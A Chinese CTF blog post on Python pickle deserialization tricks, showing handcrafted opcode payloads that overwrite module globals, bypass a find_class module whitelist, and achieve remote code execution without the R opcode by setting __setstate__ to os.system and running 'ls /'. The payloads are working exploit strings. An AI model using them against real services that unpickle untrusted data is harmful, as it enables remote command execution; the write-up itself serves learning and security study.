python反序列化的一些技巧

最新推荐文章于 2024-05-16 16:49:39 发布
最新推荐文章于 2024-05-16 16:49:39 发布
阅读量748 收藏 2
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/105180444
版权

写入全局变量

有这么一道题,彻底过滤了R指令码(写法是:只要见到payload里面有R这个字符,就直接驳回,简单粗暴)。现在的任务是:给出一个字符串,反序列化之后,namegrade需要与blue这个module里面的namegrade相对应。

import pickle
import pickletools
import base64
payload_before = b"\x80\x03c__main__\nfavorite\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub0c__main__\nAnimal\n)\x81}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."
payload_after = b"\x80\x03c__main__\nfavorite\n}q\x02(X\x04\x00\x00\x00namecblue\nname\nq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub0c__main__\nAnimal\n)\x81}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

before = pickletools.optimize(payload_before)

after = pickletools.optimize(payload_after)

print(payload_before)
pickletools.dis(before)
print('\n')

print(payload_after)
pickletools.dis(after)

在这里插入图片描述

不能用R指令码了,不过没关系。还记得我们的c指令码吗?它专门用来获取一个全局变量。我们先弄一个正常的Student来看看序列化之后的效果:
在这里插入图片描述

如何用c指令来换掉这两个字符串呢?以name的为例,只需要把硬编码的rxz改成从blue引入的name,写成指令就是:cblue\nname\n。把用于编码rxzX\x03\x00\x00\x00rxz替换成我们的这个global指令,来看看改造之后的效果:
 在这里插入图片描述



绕过c指令module限制:先读入,再篡改

之前提到过,c指令(也就是GLOBAL指令)基于find_class这个方法, 然而find_class可以被出题人重写。如果出题人只允许c指令包含__main__这一个module,这道题又该如何解决呢?

通过GLOBAL指令引入的变量,可以看作是原变量的引用。我们在栈上修改它的值,会导致原变量也被修改!

有了这个知识作为前提,我们可以干这么一件事:

  • 通过__main__.blue引入这一个module,由于命名空间还在main内,故不会被拦截
  • 把一个dict压进栈,内容是{'name': 'rua', 'grade': 'www'}
  • 执行BUILD指令,会导致改写 __main__.blue.name__main__.blue.grade ,至此blue.nameblue.grade已经被篡改成我们想要的内容
  • 弹掉栈顶,现在栈变成空的
  • 照抄正常的Student序列化之后的字符串,压入一个正常的Student对象,namegrade分别是'rua''www'
  • 由于栈顶是正常的Student对象,pickle.loads将会正常返回。到手的Student对象,当然namegrade都与blue.nameblue.grade对应了——我们刚刚亲手把blue篡改掉。
payload = b'\x80\x03c__main__\nblue\n}(Vname\nVrua\nVgrade\nVwww\nub0c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00ruaX\x05\x00\x00\x00gradeX\x03\x00\x00\x00wwwub.'

在这里插入图片描述
在这里插入图片描述

不用reduce,也能RCE

之前谈到过,reduce__与R指令是绑定的,禁止了R指令就禁止了__reduce 方法。那么,在禁止R指令的情况下,我们还能RCE吗?这就是本文研究的重点。

现在的目标是,利用指令码,构造出任意命令执行。那么我们需要找到一个函数调用fun(arg),其中fun和arg都必须可控。

审pickle源码,来看看BUILD指令(指令码为b)是如何工作的:

在这里插入图片描述

这里的实现方式也就是上文的注所提到的:如果inst拥有__setstate__方法,则把state交给__setstate__方法来处理;否则的话,直接把state这个dist的内容,合并到inst.__dict__ 里面。

它有什么安全隐患呢?我们来想想看:Student原先是没有__setstate__这个方法的。那么我们利用{'__setstate__': os.system}BUILE这个对象,那么现在对象的__setstate__就变成了os.system;接下来利用"ls /"来再次BUILD这个对象,则会执行setstate("ls /") ,而此时__setstate__已经被我们设置为os.system,因此实现了RCE.

payload:

payload = b'\x80\x03c__main__\nStudent\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb.'

在这里插入图片描述

执行结果:
在这里插入图片描述

有一个可以改进的地方:这份payload由于没有返回一个Student,导致后面抛出异常。要让后面无异常也很简单:干完了恶意代码之后把栈弹到空(指令0),然后压一个正常Student进栈。payload构造如下:

payload = b'\x80\x03c__main__\nStudent\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb0c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00ruaX\x05\x00\x00\x00gradeX\x03\x00\x00\x00wwwub.'

在这里插入图片描述

HyyMbb
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF—Python考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 3951
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
反序列化炸弹
nevermore
08-27 1113
文章目录序列化(构造炸弹)反序列化(引爆)原理解释使用建议 序列化(构造炸弹) public void serializable() throws IOException { Set<Object> root = new HashSet<>(); Set<Object> s1 = root; Set<Object&...
代码参数里的 payload 是什么意思???
热门推荐
Allen技术小站
06-02 5万+
首先解释一下什么是 payload? payload 字面意思 “有效载荷,有效负荷,有效载重”。 payload 维基百科payload中的解释: 在计算机科学与电信领域,负载(英语:Payload)是数据传输中所欲传输的实际信息,通常也被称作实际数据或者数据体。信头与元数据,或称为开销数据,仅用于辅助数据传输。[1][2] 在计算机病毒或电脑蠕虫领域中,负载指的是进行...
Python-序列化反序列化_python pb反序列化(1)
最新发布
2401_84139192的博客
05-16 393
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!序列化
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 869
详细讲解pickle
python’s revenge看python反序列化
bfd9988的博客
06-05 544
python’s revenge看python反序列化一、反序列化库pickle简介二、题目分析三、小结 这是Hitb中的一道题、python的复仇,给我印象很深。我还本地复现了一下,得到了一些小结论,在此分享一下,希望对大家有点帮助。 一、反序列化库pickle简介 在分析题目之前,先大概讲讲题目里涉及的用于反序列化的pickle库。还有一个库叫cPickle,用C语言写成,性能更佳,但不支持...
python3序列化反序列化用法实例
09-22
主要介绍了python3序列化反序列化用法,实例分析了Python3使用pickle模块针对字符串进行序列化操作的相关技巧,需要的朋友可以参考下
python反序列化-分离免杀1
08-03
Python 反序列化是一种数据恢复技术,它允许程序将之前序列化的对象状态还原为可执行的形式。在网络安全领域,尤其是渗透测试和红队行动中,反序列化被用于实现某些高级攻击技术,如远程代码执行(RCE)和免杀(防...
Python序列化共8页.pdf.zip
10-31
序列化是指将数据结构或对象转化为可传输或存储的格式,而反序列化则是相反的过程,即从序列化的数据中恢复原来的对象。在Python中,有多种方式进行序列化,包括pickle模块、json模块、xml模块、yaml模块等。 首先...
django model object序列化实例
09-17
同时,反序列化(deserialization)也是可能的,通过`deserialize()`函数,你可以将序列化的数据恢复为Django模型实例。 总的来说,Django的序列化机制主要是为QuerySet设计的,但通过上述技巧,也可以轻松处理单个...
django自带serializers序列化返回指定字段的方法
09-18
`serializers`模块是Django提供的一套工具,用于将模型实例转换为字典或字符串形式,方便进行序列化反序列化操作。 当我们想要从序列化过程中排除某些特定字段时,Django的`serializers`提供了相应的控制方式。...
有关Python序列化和存在的反序列化缺陷思考
9ian1i
03-24 8351
0x00 面试被问到了前段时间阿里内推面试,二面问到了Python序列化漏洞,问我了解吗。我说平时用过,也大概知道其序列化后是一种什么形式,但序列化漏洞没怎么关注过。心里想,Python序列化漏洞难道不是和Java还有PHP一样,都是因为敏感操作引起的吗,过分信任了输入,其实也是代码注入的一种,没什么好说的啊。结果是自己太 naive ,Python序列化方面的问题远没有这么简单。0x01 序列化
CTFSHOW 反序列化
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
三道python反序列化题目介绍
a3320315的博客
03-29 713
参考链接 从Balsn CTF pyshv学习python反序列化 源码以及wp:https://github.com/sasdf/ctf/tree/master/tasks/2019/BalsnCTF/misc python反序列化 和其他语言的序列化一样,Python序列化的目的也是为了保存、传递和恢复对象的方便性,在众多传递对象的方式中,序列化反序列化可以说是最简单和最容易实现的方式。...
ctf中的一道反序列化
weixin_40709439的博客
09-27 5255
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
Python反序列化免杀上线CS:两次编码绕过
Miracle_ze的博客
08-21 2004
如果在测试中出现crypto问题,是因为在使用python是经常会用到import一个第三方库,但是有时候会提示某个模块不存在,如Crypto其实是因为Python3里面这个模块的名字变了。这里的编码是我们上传了服务器已经编码过一次的内容进行了的反序列化,对反序列化后的内再次base64编码。编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次。此时加密后输入的加密格式是base64格式,为此要解密前需要先base64解密再进行AES解密。在文件内容加入反序列化结果。
python实现二维列表(list)的旋转、反转
yinhui_zhang的博客
04-15 9441
讲在前面的话,在leetcode刷到一道in-place的旋转图像的题,同时在想如果不原位旋转的话,肯定有其他简单的方法的,答案是肯定的。顺便写篇博客来记录一下Python中的反转list的方法。 1.Python中反转list的几种简单方法 1.1 使用reversed()的函数,它是一个生成器,返回一个对象 nums = [1,2,3,4,5] reversed_nums = list...
Python序列化反序列化
weixin_49345590的博客
11-12 186
本文的文字及图片来源于网络,仅供学习、交流使用,不具有任何商业用途,版权归原作者所有,如有问题请及时联系我们以作处理 以下文章来源于腾讯云,作者:菲宇 ( 想要学习PythonPython学习交流群:1039649593,满足你的需求,资料都已经上传群文件流,可以自行下载!还有海量最新2020python学习资料。 ) Serialization系列化,将内存中对象存储下来,把他变成一个个字节。二进制。 deSerialization反序列化,将文件的一个个字节到内存中。 序列胡保存到文件就是持久化。 可
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发现的Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 625
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
完整详细版Python全套教学课件 第02节 内置数据结构03字符串.pptx
10-01
完整详细版Python全套教学课件 第02节 内置数据结构03字符串.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值